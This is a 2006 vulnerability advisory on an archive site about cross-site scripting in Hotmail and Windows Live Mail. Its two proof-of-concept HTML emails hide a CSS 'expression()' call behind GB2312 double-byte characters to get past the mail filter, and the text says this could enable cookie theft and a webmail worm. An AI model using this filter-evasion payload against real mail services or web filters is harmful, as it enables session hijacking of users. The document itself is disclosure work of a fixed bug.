hotmail_xss.txt

2006-11-07T00:00:00
ID PACKETSTORM:51717
Type packetstorm
Reporter Cheng Peng Su
Modified 2006-11-07T00:00:00

Description

                                        
                                            `  
Adivisory Name : Hotmail and Windows Live Mail XSS Vulnerabilities   
Release Date : 2006.11.03  
Test On : Microsoft IE 6.0  
Discover : Cheng Peng Su(applesoup_at_gmail.com)  
  
Introduction:  
Hotmail and Windows Live Mail are both web-based e-mail services by Microsoft.   
  
Details:  
  
Hotmail's filter identifies "expression()" syntax in a CSS attribute. According to Hasegawa Yosuke's post(http://archive.openmya.devnull.jp/2006.08/msg00369.html), in some character encodings(e.g. GB2312), we can substitute some special double-byte chars for the corresponding chars in "expression()". In this case, we can create a malformed CSS attribute, which Hotmail's filter fails to inspect and filter the "expression()" syntax.  
  
An example:  
  
Hotmail  
--------------------------------------------------  
MIME-Version: 1.0  
From: user<user@site.com>  
Content-Type: text/html; charset=GB2312  
Subject: example  
  
<img id='sss'>  
<input id='ttt' value="javascript:alert('xss')">  
<span style="font-family:[ascii 163][asii 197]xpression[ascii 163][ascii 168]document.all.sss.src=document.all.ttt.value)">exploited</span>  
.  
--------------------------------------------------  
  
Windows Live Mail  
--------------------------------------------------  
MIME-Version: 1.0  
From: user<user@site.com>  
Content-Type: text/html; charset=GB2312  
Subject: example  
  
<img id='sss'>  
<input id='ttt' value="javascript:alert('xss')">  
<span style="font-family:[ascii 163][asii 197]xpression[ascii 163][ascii 168]document.all.EC_sss.src=document.all.EC_ttt.value)">exploited</span>  
.  
--------------------------------------------------  
  
the injected code inside the CSS attribute is responsible for  
-Getting cookies.  
-Potential web-based e-mail worm.  
  
Vender status:  
  
Microsoft was notified on Sep 25th, 2006.   
The bug is now fixed.   
  
Original advisory:  
  
http://applesoup.googlepages.com/hotmail_xss.txt  
`